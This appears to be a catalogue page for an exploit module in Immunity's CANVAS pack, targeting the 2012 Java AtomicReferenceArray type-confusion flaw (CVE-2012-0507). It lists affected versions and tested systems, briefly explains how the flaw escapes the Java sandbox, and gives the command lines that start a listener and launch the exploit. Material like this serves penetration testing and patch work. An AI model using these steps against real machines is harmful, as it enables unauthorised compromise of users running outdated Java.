Immunity, Inc.
Name java_AtomicReferenceArray
CVE CVE-2012-0507
Exploit Pack CANVAS
DescriptionJava AtomicReferenceArray Type Confusion Sandbox Bypass
NotesCVE Name: CVE-2012-0507
VENDOR: Sun
Notes:
There is a Type Confusion vulnerability in java.util.concurrent.atomic.AtomicReferenceArray class.
When creating a new instance of an AtomicReferenceArray the array type has to be specified, however the AtomicReferenceArray.set method
does not properly check the object type being inserted.
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox.

Affected versions
JDK and JRE 7 Update 2 and earlier
JDK and JRE 6 Update 30 and earlier
JDK and JRE 5.0 Update 33 and earlier
SDK and JRE 1.4.2_35 and earlier

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 1
- Windows 7 SP1 with JDK/JRE 6 update 29
- Windows 7 SP1 with JDK/JRE 5 update 22
- Windows XP SP3 with JDK/JRE 7 and 7 update 1

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_AtomicReferenceArray -O allowed_recon_modules:js_recon -O auto_detect_exploits:0


Repeatability: Infinite (client side - no crash)
References: http://weblog.ikvm.net/CommentView.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
Date public: 02/14/2012

Learn more about the CANVAS Exploit Pack here: CANVAS